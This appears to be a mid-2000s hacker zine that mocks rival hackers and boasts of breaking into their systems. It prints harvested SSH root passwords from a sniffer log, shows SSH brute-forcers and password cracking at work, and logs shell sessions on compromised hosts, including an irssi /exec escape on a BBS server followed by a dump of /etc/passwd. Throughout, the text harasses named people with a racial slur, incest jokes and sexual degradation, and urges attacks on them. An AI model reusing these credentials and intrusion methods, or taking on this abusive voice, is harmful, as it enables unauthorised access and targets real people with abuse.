Host 196.15.249.65 appears to be up. Host 196.15.249.66 appears to be up. [root@plet ...]# cat ssheist-1.log =========================================================================== Username: root Password: n3tw0rk1ng Host: lin02.*******.**.** =========================================================================== =========================================================================== Username: root Password: `1q2wsxde Host: lin02.*******.**.** =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: localhost =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.*********.**.** =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.*********.**.** =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: sodwana.*********.**.** =========================================================================== =========================================================================== Username: root Password: coahtr Host: histologic.*****.**** =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.*********.**.** =========================================================================== =========================================================================== Username: test Password: test Host: 129.*.***.** =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.*********.**.** =========================================================================== =========================================================================== Username: root Password: n3tw0rk1ng Host: knysna.*********.**.** =========================================================================== [root@plet ...]# cd john-1.6/ [root@plet john-1.6]# cd run [root@plet run]# ls 128.8.140.206.shadow john.ini restore all.chr john.pot unafs@ alpha.chr lanman.chr unique@ digits.chr mailer* unshadow@ john* password.lst [root@plet run]# ps aux |grep sshbrute root 14207 0.0 0.0 2632 764 ? S Jun03 0:12 ./sshbrute -brute root 27645 0.0 0.0 2632 760 ? S Jun10 0:04 ./sshbrute2 -brut root 27695 0.0 0.0 2632 760 ? S Jun10 0:01 ./sshbrute2 -brut root 27805 0.0 0.0 2632 764 ? S Jun10 0:00 ./sshbrute -brute root 26355 0.0 0.0 2632 764 ? S Jun11 0:00 ./sshbrute -brute root 32265 0.0 0.0 2632 764 ? S Jun12 0:00 ./sshbrute -brute root 32275 0.0 0.0 2632 760 ? S Jun12 0:00 ./sshbrute2 -brut root 18328 0.5 0.1 2800 1268 ? S 01:29 0:01 ./sshbrute -brute root 18369 0.3 0.1 2796 1296 ? S 01:30 0:00 ./sshbrute -brute root 18397 0.5 0.1 2796 1296 ? S 01:31 0:00 ./sshbrute -brute root 18433 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut root 18436 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute -brute root 18459 0.2 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut root 18470 0.2 0.1 2784 1120 ? S 01:33 0:00 ./sshbrute2 -brut root 18471 0.0 0.1 3172 1320 pts/4 R 01:33 0:00 ps aux [root@plet run]# logout ---------------------------------- skew @ histologic: nothing much here but more pr00f skew == tal0n. ---------------------------------- login as: root root@histologic's password: Last login: Tue Jun 14 04:51:51 2005 from adsl-10-197-59.mia.bellsouth.net [root@histofw root]# history | grep talon 963 adduser talon 964 passwd talon 965 su talon 966 userdel talon 967 userdel -r talon 968 rm -rf /home/talon [root@histofw root]# ls -al /tmp/.../ total 16 drwx------ 2 root root 4096 Jun 12 06:03 ./ drwxrwxrwt 6 root root 4096 Jun 14 05:14 ../ -rw-r--r-- 1 root root 5595 Jun 12 14:30 nmap.log ------------------------------------ skew @ knysna: absolutely nothing here just some lame hacking attempts it seems. ------------------------------------ login as: root root@knysna's password: Last login: Tue Jun 14 01:42:21 2005 from dsl-5-37.sg-b.tiscali.no [root@knysna root]# history | tail -n11 987 w 988 cat /var/tmp/.ssheiost.log 989 cat /var/tmp/.ssheist.log 990 host 196.**.***.*** 991 host 196.**.**.*** 992 ssh root@196.**.**.*** 993 cat /var/tmp/.ssheist.log 994 host 196.**.**.*** 995 cat > /var/tmp/.ssheist.log 996 cat /var/tmp/.ssheist.log 997 exit [root@knysna root]# ls -al '/tmp/.../' total 8 drwx------ 2 root root 4096 Jun 8 16:32 ./ drwxrwxrwt 5 root root 4096 Jun 14 04:03 ../ [root@knysna root]# ls -al /car/tmp/v total 8 drwxrwxrwt 2 root root 4096 Jun 14 04:03 ./ drwxr-xr-x 20 root root 4096 Aug 31 2004 ../ -rw-r--r-- 1 root root 0 Jun 13 15:32 .ssheist.log [root@knysna root]# logout ~-~-~-~-~-~-~-~-~-~-~-~-~-~ > From these shells we notice a few things: 1. that tal0n sets up sshbrute (his ssh brute forcer) 1: that tal0n sets up ssheist (his ssh sniffer) 2: he usually makes a dir /.../ in /tmp/ so if you have /tmp/.../ you have been owned by skew. but thats fucking impossible unless youre a complete dumbshit 3: skew cant hack. ~-~-~-~-~-~-~-~-~-~-~-~-~-~ [5] LAUGH FOR DAYZ AT THIS DORK ~-~-~-~-~-~-~-~-~-~-~-~-~-~ I hope skew has learned from all of this not to talk shit about people dont fuck over your friends (now you know how it feels) stop coding complete shit, stop the lies, admit youre tal0n, and dont think you are better than us. you are not. -~-~-~ NEWZ: sources report after his latest own skew has changed nicks again! IMAGINE THAT! sources say his new handle is tivofreakr2d2.. rm on sight. -~-~-~ -~-~-~ MORENEWZ: being tiped off tal0n has changed his nick again. rm bandit at will. -~-~-~ 06.txt -~-~-~ k33p1ng 0d4y s4f3 (th3 v3rs10n phC n3v3r w4nt3d y0u t0 s33!!) l3tz jump r1ght 1nt0 th3 th30ry 0f w4r3z st34l1ng. 4s th3 gr34t sun s3cur1ty 3xp3rt l4nc3 sp1tzc0q 0nc3 s41d "t0 kn0w 4 h4qu3r y0u n33d t0 sl33p w1th 4 haqu3r", much th3 s4m3 c4n b3 s41d 4b0ut 0d4yyzz. y0u n33d t0 f1nd wh3r3 th3y l1v3. y0u n33d t0 curl up w1th th3m l4t3 4t n1ght wh3n m0mmy 1z sl33p1ng. Th3y 4r3 usu4lly 1n grep 'h4qu3r' /etc/passwd's $H0M3. 0r 4s w3 c4n s33 1n twd`z ~/ Aug 01 05:15:46 HELL YEAH! Aug 01 05:15:46 | ___| | / _ \ / _ \| _ \ Aug 01 05:15:46 | |_ | | | | | | | | | | | | Aug 01 05:15:46 | _| | |__| |_| | |_| | |_| | Aug 01 05:15:46 |_| |_____\___/ \___/|____/ Aug 01 05:15:48 Aug 01 05:15:53 be el8 Aug 01 05:15:59 RESPEK NIGGA... WOOPTY-WOO Aug 01 05:16:02 I AM FLOODING YOU LAWL Aug 01 05:16:04 I AM FLOODING YOU LAWL Aug 01 05:16:07 I AM FLOODING YOU LAWL Aug 01 05:16:14 wanna see some 0day w4r3z? Aug 01 05:16:50 vista? Aug 01 05:16:51 lol Aug 01 05:16:59 /usr/home/twd Aug 01 05:17:08 thatz where all my 0day ju4r3z iz ^^ Aug 01 05:17:30 bettar yet Aug 01 05:17:35 total 55144 Aug 01 05:17:36 drwxr-xr-x 12 twd leet 1024 Jul 31 19:01 . Aug 01 05:17:36 drwxr-xr-x 4 root whe 512 Jun 29 15:00 .. Aug 01 05:17:36 drwx------ 3 twd leet 512 Jun 29 03:05 .BitchX Aug 01 05:17:36 -rw-r--r-- 1 twd leet 771 Jun 29 01:52 .cshrc Aug 01 05:17:36 <-- twd has quit (Excess Flood) t00 m4ny 0d4yz!!! n0w th1z c0ckg0bbl3r s4yz h3 c0d3z 0d4yz 3v3ryd4y, but h3'z t00 f4t t0 us3 th3 c0mput4r th4t much. h1z m0m h3lpz h1m g3t 0ut 0f b3d 0n th3 w33k3ndz s0 h3 c4n c0d3 3 l1n3z 0f ass3mbly. b3c4us3 0f th1z 1nc3ns3 r3l4t10nsh1p A n3tw0rk 0f truzt w4z f0rm3d. 3v3n th0ugh w3 4r3 g0nn4 3xpl01t 1t w3 r3sp3ct th3 m0m r4p3, s0 w3'll l34v3 th31r 3v3r-l4st1ng l0v3 4l0n3. l3tz s33 wh4t h4pp3ndz wh3n w3 msg el1t3_twd`z_m0m 0n msn... el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : hello sexy young boy. h0fuckno@yourbox.di0adsux.com : huuuuu!!! el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : tell me what you want. h0fuckno@yourbox.di0adsux.com : 3y3 w4nt 0d4yz h0fuckno@yourbox.di0adsux.com : g1v3 m3 twd`z r00t p4zz h0fuckno@yourbox.di0adsux.com : pl34s3 wh0r3. el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : ok. let me first get comfortable. el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : /me takes off her granny panties el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : /me lights a candle h0fuckno@yourbox.di0adsux.com : b1tch pl34z3. 3y3'm buzy. el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : ok ok. el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : I guess I'll dance for twd tonight el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : ssh twd.likes-mum.com -ltwd -p1337 el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : pass: BiSons4Mumz - msg not recieved. user is currently on ignore list - - msg not recieved. user is currently on ignore list - - msg not recieved. user is currently on ignore list - - msg not recieved. user is currently on ignore list - m0mmy_d34r3zt@twdz-mumz.org : you bastard! atleast finger fuck me! - msg not recieved. user is currently on ignore list - - msg not recieved. user is currently on ignore list - - msg not recieved. user is currently on ignore list - - msg not recieved. user is currently on ignore list - - msg not recieved. user is currently on ignore list - - msg not recieved. user is currently on ignore list - - msg not recieved. user is currently on ignore list - - msg not recieved. user is currently on ignore list - 0kz, s0 sh3'z nutz 4z fuq, but y0u s33 th1z 1z br0k3n truzt. f0r m0re 1nf0rm4t10n r34d th0mps0n'z p4p3r 0n truzt1ng truzt, 0r h1z l3zz3r kn0wn p4p3r 0n truzt1ng tr0j4n c0nd0mz. h3h3h3. -~-~-~ !!!th1z juzt 1n!!! ~-~-~-~ el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : I thought you could only get pregnate el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : if the son's cock was more than 2 1/2 inches long. h0fuckno@yourbox.di0adsux.com : http://acm.org/paperz/truzting_condomz.txt y0u dumb cunt! sh3'z pr3gn4t3!! 3y3 d3t3ct 4n0th3r r3t4rd w1ll s00n 3nt3r th3 bl00dl1n3. sh3 b3tt3r l4y 0ff th3 fuqn h3r01n. -~-~-~ b4q t0 th3 w4r3z hunt ~-~-~-~ 4nyw4yz. twd` m0m 1z 4 d1rty wh0r3 4nd twd`z g0t s0m3 0d4yz t0 st34l. 0n w1th th3 sh0w... [(root@r0q1ngw1thch4rt3r) (/) ] # ls -al /usr/home/twd total 55144 drwxr-xr-x 12 twd leet 1024 Jul 31 19:01 . drwxr-xr-x 4 root wheel 512 Jun 29 15:00 .. drwx------ 3 twd leet 512 Jan 02 1998 drwx------ 3 twd leet 512 Jun 29 03:05 .BitchX -rw-r--r-- 1 twd leet 771 Jun 29 01:52 .cshrc drwxr-x--- 3 twd fedz 512 Jul 31 19:01 .n4rql0gz lrwxrwxrwx 1 twd leet 9 Jan 02 1998 .3y3d0nth4v34nyth1ng -> /dev/null lrwxrwxrwx 1 twd leet 9 Jun 02 1998 .pl34zel34v3m34l0n3 -> /bin/exit [(root@r0q1ngw1thch4rt3r) (/) ] # wtf, wh3r3z th3 0d4yz? .n4rql0gz 1s juzt 4 l0g 0f #netwhores@efnet (<- d0rk13st pl4c3 0n 34rth) 4nd s0m3 l0gz 0f d1v1n31nt try1ng t0 h4q 4 w1nd0wz b0x. 1t turnz 0ut, 4ft3r cl0s3 1nsp3ct10n th4t th3r3 1z 4 s3cr3t d1r us1ng 0ld h4ck3r tr1ck!!! [(root@r0q1ngw1thch4rt3r) (/) ] # cd "/usr/home/twd/ " [(root@r0q1ngw1thch4rt3r) (/usr/home/twd/ ) ] # ls -al total 55144 drwx------ 12 twd leet 1024 Jun 02 1998 . drwxr-xr-x 4 twd leet 512 Jul 31 19:01 .. drwx------ 3 twd leet 512 Jan 02 1998 mumpiqz -rw------- 1 twd leet 771 Nov 24 1997 mircd0s.sh -rw------- 1 twd leet 771 Dec 08 1997 abo1.c -rw------- 1 twd leet 771 Jan 01 1998 sshbrute3.c [(root@r0q1ngw1thch4rt3r) (/usr/home/twd/ ) ] # buh4h4h4h4. h3 h4z n0 0d4yz, but w3 scp'd th3s3 4nyw4yz. twd`, y0u suq. twd`_mum, y0u suq twd`. burn3y3, y0u suq. byt3r4g3, y0ur rul3! wr1tt1ng 0d4yz 0n p4p3r 1z th3 0nly w4y h0no d03z 1t. (d0nt pr1nt 1t.. fx 1z sn1ff1ng y0ur pr1nt3r!!) 07.txt -~-~-~ g0tfuq3d, g0t0wn3d, g0tn00d4yz4h0not0st34l... /* GotFaulT .... ____ __ _____ __ __ /\ _`\ /\ \__/\ __`\ /'__`\ /\ \ \ \ \L\_\ ___\ \ ,_\ \ \/\ \ __ __ __ ___ /\_\L\ \ \_\ \ \ \ \L_L / __`\ \ \/\ \ \ \ \/\ \/\ \/\ \ /' _ `\/_/_\_<_ /'_` \ \ \ \/, \/\ \L\ \ \ \_\ \ \_\ \ \ \_/ \_/ \/\ \/\ \/\ \L\ \/\ \L\ \ \ \____/\ \____/\ \__\\ \_____\ \___x___/'\ \_\ \_\ \____/\ \___,_\ \/___/ \/___/ \/__/ \/_____/\/__//__/ \/_/\/_/\/___/ \/__,_ / th1s h0m0'5 4r3 l4me.. 5eC c0mmuN1Ty'z 4re Pl4YeD 0u7 f00lz.. y0u 9uYz 5uR3 d0 GoTFauLT 7h0hGh.. Y0uZ GoTFaulTY C0d1nd h0h0h0h0 */ login as: publisher publisher@gotfault.org's password: Last login: Wed Jun 12 12:10:36 2005 from h.0.n.o Enable ANSi? [Y/n]> Y B+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ | | | ________ __ _____ .__ __ | | / _____/ _____/ |__/ ____\____ __ __| |_/ | | | / \ ___ / _ \ __\ __\\__ \ | | \ |\ __\ | | \ \_\ ( <_> ) | | | / __ \| | / |_| | | | \______ /\____/|__| | | (____ /____/|____/__| | | \/ | | \/ | | | | | | udits | | chat| | oolbox | | lackboard| |

apers | | ptions| | xploits | | ho's Online | | nipplets |__| ogout | | | +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ gotfault> C 14:28 -!- Irssi: Looking up localhost14:28 -!- Irssi: Connecting to localhost h4h4h4 irssi 0wnz th3m. [(status)] [14:28] [publisher] [1:localhost (change with ^X)] 14:28 -!- Irssi: Connection to localhost established [publisher] [1:localhost (change with ^X)] [14:29]/exec uname -a;id 14:29 Linux gerrit 2.4.29-vs1.2.10 #3 SMP Mo Apr 11 17:42:48 CEST 2005 i686 GNU/Linux 14:29 uid=1006(publisher) gid=1006(publisher) groups=1006(publisher) 14:29 -!- Irssi: process 0 (uname -a;id) terminated with return code 0 /exec ls -al 14:29 total 4014:29 drwx------ 8 publisher publisher 4096 May 23 04:46 . 14:29 drwxr-xr-x 16 root root 4096 Jun 4 15:56 .. 14:29 -rw------- 1 publisher root 6 May 23 14:39 .bash_history 14:29 drwx------ 2 publisher publisher 4096 May 22 19:42 .irssi 14:29 drwxr-xr-x 2 publisher publisher 4096 May 23 04:33 ansi 14:29 drwxr-xr-x 2 publisher publisher 4096 May 23 04:42 ascii 14:29 drwxr-xr-x 2 publisher publisher 4096 May 23 04:36 bin 14:29 drwxr-xr-x 9 publisher publisher 4096 May 23 04:40 database 14:29 -rwxr-xr-x 1 publisher publisher 1124 May 22 19:52 publisher 14:29 drwxr-xr-x 2 publisher publisher 4096 May 23 04:33 scripts 14:29 -!- Irssi: process 0 (ls -al) terminated with return code 0 wh0z uP 1n hUr!?!? /exec cat /etc/passwd 14:30 root:x:0:0:root:/root:/bin/bash 14:30 daemon:x:1:1:daemon:/usr/sbin:/bin/sh 14:30 bin:x:2:2:bin:/bin:/bin/sh 14:30 sys:x:3:3:sys:/dev:/bin/sh 14:30 sync:x:4:65534:sync:/bin:/bin/sync 14:30 games:x:5:60:games:/usr/games:/bin/sh 14:30 man:x:6:12:man:/var/cache/man:/bin/sh 14:30 lp:x:7:7:lp:/var/spool/lpd:/bin/sh 14:30 mail:x:8:8:mail:/var/mail:/bin/sh 14:30 news:x:9:9:news:/var/spool/news:/bin/sh 14:30 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 14:30 proxy:x:13:13:proxy:/bin:/bin/sh 14:30 postgres:x:31:32:postgres:/var/lib/postgres:/bin/false 14:30 www-data:x:33:33:www-data:/var/www:/bin/sh 14:30 backup:x:34:34:backup:/var/backups:/bin/sh 14:30 operator:x:37:37:Operator:/var:/bin/false 14:30 list:x:38:38:Mailing List Manager:/var/list:/bin/sh 14:30 irc:x:39:39:ircd:/var/run/ircd:/bin/sh 14:30 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 14:30 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 14:30 sshd:x:100:65534::/var/run/sshd:/bin/false 14:30 postfix:x:101:101::/var/spool/postfix:/bin/false 14:30 mysql:x:102:103:MySQL Server:/var/lib/mysql:/bin/false 14:30 vmail:x:2000:2000::/home/vmail:/bin/false 14:30 snort:x:103:104:Snort IDS:/var/log/snort:/bin/false 14:30 smmsp:x:104:105:Mail Submission Program,,,:/var/lib/sendmail:/bin/false 14:30 setnf:x:1000:100::/home/setnf:/bin/bash 14:30 fourtrax:x:1002:1002:,,,:/home/fourtrax:/bin/bash 14:30 posidron:x:2002:100::/home/posidron:/bin/bash 14:30 rushjo:x:2003:100::/home/rushjo:/bin/bash 14:30 sirphreak:x:2004:100::/home/sirphreak:/bin/bash 14:30 awk:x:2005:100::/home/awk:/bin/bash 14:30 spot:x:2006:100::/home/spot:/bin/bash 14:30 khz:x:2007:100::/home/khz:/bin/bash 14:30 peacetreaty:x:1001:1001:,,,:/home/peacetreaty:/bin/bash 14:30 certificate:x:1003:1003:Certificate User,,,:/home/certificate:/home/certificate/bin/stncert/buildssh 14:30 nutshell:x:1004:1004:,,,:/home/nutshell:/bin/bash 14:30 phyro:x:1005:1005:,,,:/home/phyro:/bin/bash 14:30 publisher:x:1006:1006:Publisher System,,,:/home/publisher:/home/publisher/publisher 14:30 trapdown:x:1007:1007:,,,:/home/trapdown:/bin/bash -!- Irssi: process 0 (cat /etc/passwd) terminated with return code 0 /exec ls -al /home/ 14:31 total 64 14:31 drwxr-xr-x 16 root root 4096 Jun 4 15:56 . 14:31 drwxr-xr-x 17 root root 4096 Jun 13 02:11 .. 14:31 drwx------ 4 awk users 4096 Jun 14 00:32 awk < GRRRAAWWWLLLL!!!! AWK!!! GRRRAAWWWL!LL!!!@# 14:31 drwx------ 6 certificate certificate 4096 Jun 15 07:48 certificate 14:31 drwx------ 2 fourtrax users 4096 Jan 3 20:43 fourtrax 14:31 drwx------ 3 khz users 4096 May 27 15:02 khz 14:31 drwx------ 5 nutshell users 4096 Jun 10 02:40 nutshell 14:31 drwx------ 2 peacetreaty users 4096 Apr 19 14:31 drwx------ 8 phyro users 4096 May 28 22:26 phyro 14:31 drwx------ 12 posidron users 4096 Jun 15 08:34 posidron < th1s m0f0 w1ll sh3llc0d3 y0u t0 d3f !! 14:31 drwx------ 8 publisher publisher 4096 May 23 04:46 publisher 14:31 drwx------ 5 rushjo users 4096 Apr 29 01:39 rushjo 14:31 drwxrwxr-x 9 521 521 4096 Jun 14 23:16 setnf 14:31 drwx------ 9 sirphreak users 4096 Jun 1 09:29 sirphreak 14:31 drwx------ 6 spot users 4096 May 16 02:39 spot 14:31 drwx------ 5 trapdown trapdown 4096 Jun 7 03:12 trapdown 14:31 -!- Irssi: process 0 (ls -al /home/) terminated with return code 0 /exec locate * |grep home 14:32 /home/publisher/ansi 14:32 /home/publisher/ansi/audits.menu 14:32 /home/publisher/ansi/blackboard.menu 14:32 /home/publisher/ansi/bytecode.menu 14:32 /home/publisher/ansi/exploits.menu 14:32 /home/publisher/ansi/main.menu 14:32 /home/publisher/ansi/options.menu 14:32 /home/publisher/ansi/papers.menu 14:32 /home/publisher/ansi/snipplets.menu 14:32 /home/publisher/ansi/tools.menu 14:32 /home/publisher/ascii 14:32 /home/publisher/ascii/audits.menu 14:32 /home/publisher/ascii/bytecode.menu 14:32 /home/publisher/ascii/exploits.menu 14:32 /home/publisher/ascii/main.menu 14:32 /home/publisher/ascii/options.menu 14:32 /home/publisher/ascii/papers.menu 14:32 /home/publisher/ascii/snipplets.menu 14:32 /home/publisher/ascii/tools.menu 14:32 /home/certificate/bin 14:32 /home/certificate/bin/stncert 14:32 /home/certificate/bin/stncert.tgz 14:32 /home/certificate/bin/stncert/buildssh 14:32 /home/certificate/bin/stncert/build_ca.sh 14:32 /home/certificate/bin/stncert/build_ca_cert.sh 14:32 /home/certificate/bin/stncert/build_cert.sh 14:32 /home/certificate/bin/stncert/email.txt 14:32 /home/certificate/bin/stncert/ircs.conf 14:32 /home/certificate/bin/stncert/README 14:32 /home/certificate/bin/stncert/removepass.sh 14:32 /home/certificate/bin/stncert/stunnel.pid 14:32 /home/posidron/audit/daemons/jukepeg-1.9/mpglib/tabinit.c 14:32 /home/posidron/audit/ftpd/kadet/bin 14:32 /home/posidron/audit/ftpd/kadet/bin/kadet 14:32 /home/posidron/audit/ftpd/kadet/bin/kadet.in 14:32 /home/posidron/audit/ftpd/kadet/bin/mod 14:32 /home/posidron/audit/ftpd/kadet/bin/mod.in 14:32 /home/posidron/audit/ftpd/pftpd-1.0/.gdbinit 14:32 /home/posidron/audit/httpd/aolserver-4.0.10/nsd/binder.c 14:32 /home/posidron/audit/httpd/aolserver-4.0.10/nsdb/dbinit.c 14:32 /home/posidron/audit/httpd/boa-0.94.13/src/webindex.pl 14:32 /home/posidron/audit/httpd/monkey-0.9.1/bin 14:32 /home/posidron/audit/httpd/monkey-0.9.1/cgi-bin 14:32 /home/posidron/audit/httpd/monkey-0.9.1/cgi-bin/test.pl 14:32 /home/posidron/audit/httpd/wn-2.4.6/bin 14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wncat 14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnhtmlify 14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnindexmaker 14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnpnuts 14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnredir 14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnsectsearch 14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnseven_m 14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnv2c 14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wn_mkdigest 14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wn_mkpasswd 14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wn_uncache 14:32 /home/posidron/audit/imapd/mailutils-0.6.1/intl/bindtextdom.c 14:32 /home/posidron/audit/local/usr/local/bin 14:32 /home/posidron/audit/local/usr/local/bin/libmikmod-config 14:32 /home/posidron/dump/bytecode/shellcodes/aix/aix-execve_bin-sh.c 14:32 /home/posidron/dump/bytecode/shellcodes/all-OS/LNX-FBSD-bin-sh.c 14:32 /home/posidron/dump/bytecode/shellcodes/alpha/execve-binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/alpha/execve_binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/alpha/portbindsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/bind.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/bsdi-execve_binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/bsdi-execve_binsh2.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve-bin-sh.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve-bin-sh.S 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve-binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh.netbsd.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh3.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh_cmd.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/fbsd-portbinding.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/freebsd.23-bytes-execve_binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/nbsd-execve_binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/nbsd-portbinding.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/obsd-execve-binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/obsd-portbinding.c 14:32 /home/posidron/dump/bytecode/shellcodes/bsd/portbinding.c 14:32 /home/posidron/dump/bytecode/shellcodes/hp-ux/execve_binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/irix/bindsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/irix/execve-binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/irix/irix-bin-sh.c 14:32 /home/posidron/dump/bytecode/shellcodes/irix/irix-mips-bind.c 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bin-cat-etc-passwd.c 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bin-cat-motd.c 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bind2 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bind2.c 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/connect-read-exec-63-byte/bind_for_connect-read-exec-63-byte.c 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh.c~ 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh1.c 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh2.c 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve_binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve_binsh1.c 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/portbinding 14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/portbinding.c 14:32 /home/posidron/dump/bytecode/shellcodes/lnx-bind 14:32 /home/posidron/dump/bytecode/shellcodes/lnx-bind.c 14:32 /home/posidron/dump/bytecode/shellcodes/ppc/bsd-execve_binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/ppc/linux-execve_binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/sco/execve_binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/sco/execve_binsh2.c 14:32 /home/posidron/dump/bytecode/shellcodes/sco/portbinding.c 14:32 /home/posidron/dump/bytecode/shellcodes/solaris-x86/bindshell.txt 14:32 /home/posidron/dump/bytecode/shellcodes/solaris-x86/execve-binsh.c 14:32 /home/posidron/dump/bytecode/shellcodes/solaris-x86/portbinding.c 14:32 /home/posidron/dump/bytecode/shellcodes/sparc/portbind.c 14:32 /home/posidron/dump/bytecode/shellcodes/sparc/portbinding.c 14:32 /home/posidron/dump/bytecode/shellcodes/win/w00w00-bindshell.c 14:32 /home/publisher/bin14:32 /home/publisher/bin/bbs_audits_a 14:32 /home/publisher/bin/bbs_audits_p14:32 /home/publisher/bin/bbs_audits_s 14:32 /home/publisher/bin/bbs_bb_a 14:32 /home/publisher/bin/bbs_bb_p 14:32 /home/publisher/bin/bbs_bb_s 14:32 /home/publisher/bin/bbs_bytecode_a 14:32 /home/publisher/bin/bbs_bytecode_p 14:32 /home/publisher/bin/bbs_bytecode_s 14:32 /home/publisher/bin/bbs_chat 14:32 /home/publisher/bin/bbs_exploits_a 14:32 /home/publisher/bin/bbs_exploits_p 14:32 /home/publisher/bin/bbs_exploits_s 14:32 /home/publisher/bin/bbs_options_c 14:32 /home/publisher/bin/bbs_papers_a 14:32 /home/publisher/bin/bbs_papers_p 14:32 /home/publisher/bin/bbs_papers_s 14:32 /home/publisher/bin/bbs_snipplets_a 14:32 /home/publisher/bin/bbs_snipplets_p 14:32 /home/publisher/bin/bbs_snipplets_s 14:32 /home/publisher/bin/bbs_tools_a 14:32 /home/publisher/bin/bbs_tools_p 14:32 /home/publisher/bin/bbs_tools_s 14:32 /home/publisher/bin/bbs_whois 14:32 /home/sirphreak/0x80/x80/src/mod/gseen.mod/generic_binary_tree.c 14:32 /home/sirphreak/x80/eggdrop1.6.16/src/mod/gseen.mod/generic_binary_tree.c 14:32 /home/posidron/code/admiral/database 14:32 /home/posidron/code/admiral/database/db_debian 14:32 /home/posidron/code/admiral/database/db_frsirt 14:32 /home/posidron/code/admiral/include/database.h 14:32 /home/posidron/code/admiral/src/database.c 14:32 /home/posidron/code/admiral/src/database.c.save 14:32 /home/posidron/code/admiral/src/database.c.save.1 14:32 /home/posidron/code/backup/database 14:32 /home/posidron/code/backup/include/database.h 14:32 /home/posidron/code/backup/src/database.c 14:32 /home/publisher/database 14:32 /home/publisher/database/audits 14:32 /home/publisher/database/audits/serial 14:32 /home/publisher/database/blackboard 14:32 /home/publisher/database/blackboard/serial 14:32 /home/publisher/database/bytecode 14:32 /home/publisher/database/bytecode/serial 14:32 /home/publisher/database/exploits 14:32 /home/publisher/database/exploits/serial 14:32 /home/publisher/database/papers 14:32 /home/publisher/database/papers/serial 14:32 /home/publisher/database/snipplets 14:32 /home/publisher/database/snipplets/0 14:32 /home/publisher/database/snipplets/1 14:32 /home/publisher/database/snipplets/serial 14:32 /home/publisher/database/tools 14:32 /home/publisher/database/tools/serial 14:32 /home/setnf/pfprintd-0.5/src/database.c 14:32 /home/publisher 14:32 /home/publisher/.bash_history 14:32 /home/publisher/.irssi 14:32 /home/publisher/.irssi/config 14:32 /home/publisher/ansi 14:32 /home/publisher/ansi/audits.menu 14:32 /home/publisher/ansi/blackboard.menu 